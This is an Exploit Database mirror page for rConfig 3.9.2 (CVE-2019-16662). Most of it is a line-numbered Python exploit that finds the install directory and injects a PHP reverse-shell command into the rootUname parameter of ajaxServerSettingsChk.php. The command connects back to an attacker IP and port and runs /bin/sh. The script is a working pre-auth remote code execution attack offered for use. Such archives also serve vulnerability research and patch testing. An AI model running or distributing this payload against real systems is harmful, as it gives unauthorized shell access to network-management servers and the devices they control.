rConfig 3.9.2 - Remote Code Execution
https://awesome.hackpuntes.com/exploit-db/rconfig-3.9.2-remote-code-execution
rConfig 3.9.2 - Remote Code Execution
Exploit Database

FILES

rconfig-3.9.2.zip
1MB
Binary
Vulnerable software
rConfig-preauth.txt
1KB
Text
Exploit PreAuth
rConfig-postauth.txt
2KB
Text
Exploit PostAuth

POC

ORIGINAL

1
# Exploit Title: rConfig 3.9.2 - Remote Code Execution
2
# Date: 2019-09-18
3
# Exploit Author: Askar
4
# Vendor Homepage: https://rconfig.com/
5
# Software link: https://rconfig.com/download
6
# Version: v3.9.2
7
# Tested on: CentOS 7.7 / PHP 7.2.22
8
# CVE : CVE-2019-16662
9
10
#!/usr/bin/python
11
12
import requests
13
import sys
14
from urllib import quote
15
from requests.packages.urllib3.exceptions import InsecureRequestWarning
16
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
17
18
if len(sys.argv) != 4:
19
print "[+] Usage : ./exploit.py target ip port"
20
exit()
21
22
target = sys.argv[1]
23
24
ip = sys.argv[2]
25
26
port = sys.argv[3]
27
28
payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))
29
30
install_path = target + "/install"
31
32
req = requests.get(install_path, verify=False)
33
if req.status_code == 404:
34
print "[-] Installation directory not found!"
35
print "[-] Exploitation failed !"
36
exit()
37
elif req.status_code == 200:
38
print "[+] Installation directory found!"
39
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload
40
41
print "[+] Triggering the payload"
42
print "[+] Check your listener !"
43
44
requests.get(url_to_send, verify=False)
45
46
47
rConfig-preauth.png
Copied!
Copy link